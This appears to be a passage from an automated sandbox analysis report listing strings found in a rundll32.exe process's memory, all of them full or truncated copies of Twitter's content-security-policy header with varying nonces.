Source: rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YjQyNWU0NzAtMGE4Ny00NTIwLTlhOTAtOWFmNTkzZTJjMjhm'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YjczNzA0MmItNmY0NC00NzY5LWExYmMtODk4NDc2OTE3ZTE1'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.469351386.000001DEAA28D000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YzljMjBhMGYtOTJkZi00YmMxLWEzNjktZTU3MGJkZTNiMGI3'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZGE3OWY3YTctYzQ0NS00N2RhLTlkZjctNzk4M2RkYjM1Mjli'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZTRjN2QxODMtYzcyMC00YzMwLWFmM2QtYTNiMTAwNjUwYzJk'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.426876801.000001DEA8573000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZjNkYzhiZTItNDE4Ny00MDdhLTk0YzQtNjA0NmM0ZWM2NTc4'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZjQ2MzdlMGUtYzYyYi00NmZmLWI2OGItM2FiNDBmMGQxZDMx'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.581005966.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZmVkOGMyZmEtOTczMS00YzdhLWI5N2UtYWRkMDk3YzM4YmU5'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhs://mpdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.467338593.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/8 equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/FF equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.411842354.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/g equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.403587903.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/{ equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.411963934.000001DEA8579000.00000004.00000001.sdmpString found in binary or memory: curity-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.356545949.000001DEA855D000.00000004.00000001.sdmpString found in binary or memory: d.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: 